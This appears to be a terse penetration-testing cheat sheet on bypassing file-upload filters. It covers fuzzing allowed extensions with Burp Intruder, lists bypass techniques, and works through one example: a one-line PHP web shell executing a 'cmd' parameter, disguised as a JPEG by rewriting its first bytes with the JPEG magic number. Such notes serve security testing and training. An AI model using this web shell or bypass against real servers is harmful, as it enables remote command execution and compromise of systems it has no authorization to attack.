Upload File
What extension is allowed ?
Upload a file, once this request is captured, send it to the Intruder. Click on "Payloads" and select the "Sniper" attack type.
Click the "Positions" tab now, find the filename and "Add §" to the extension. It should look like so:
Use /usr/share/wordlists/dirb/extensions_common.txt
Uncheck url-encoding
Run the attack
Rename it
Content Type
Null Byte
In image - exiftool
Zip file
Magic Number
Add four "A" on the first line of shell.php.
hexeditor shell.php
Change the first 4 bytes "41 41 41 41" to "FF D8 FF DB" (jpeg magic number)
Result:
00000000 FF D8 FF DB 3C 3F 70 68 70 20 73 79 73 74 65 6D <?php system 00000010 28 24 5F 47 45 54 5B 63 6D 64 5D 29 3B 20 3F 3E ET[cmd]); ?> 00000020 0A
Save. Verification: file shell.php
: shell.php: JPEG image data
Magic numbers list:
Sources
Last updated